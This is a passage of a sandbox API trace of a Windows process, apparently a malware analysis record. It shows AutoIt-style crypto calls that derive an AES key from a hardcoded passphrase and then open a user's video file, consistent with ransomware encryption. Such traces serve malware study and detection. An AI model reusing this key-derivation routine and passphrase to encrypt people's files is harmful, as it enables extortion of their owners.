1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0098.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e568 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0098.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0098.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0098.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0098.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca118, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0098.237] CloseHandle (hObject=0x298) returned 1 [0098.238] FreeLibrary (hLibModule=0x772d0000) returned 1 [0098.238] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0098.238] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ba7cc0, ftCreationTime.dwHighDateTime=0x1d5f012, ftLastAccessTime.dwLowDateTime=0xea544c10, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xea544c10, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0xa962, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="9zsS8CRW.avi", cAlternateFileName="")) returned 0x41ac2c0 [0098.238] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0098.238] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0098.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0098.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0098.239] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0098.240] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0098.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.240] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0098.240] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0098.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0098.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0098.240] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.240] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca550, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0098.240] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0098.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0098.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0098.240] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0098.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0098.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0098.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca4d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0098.241] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0098.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.241] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0098.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0098.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca670, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0098.241] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0098.291] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.291] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0098.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0098.291] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0098.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0098.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0098.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0098.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0098.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0098.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0098.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0098.292] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0098.293] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0098.293] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0098.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0098.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9zss8crw.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0098.294] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.294] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0098.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0098.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0098.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0098.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0098.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0098.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.294] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0098.295] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0098.295] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0098.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a48c0 [0098.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0098.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0098.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a48c0 | out: hHeap=0x1780000) returned 1 [0098.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) 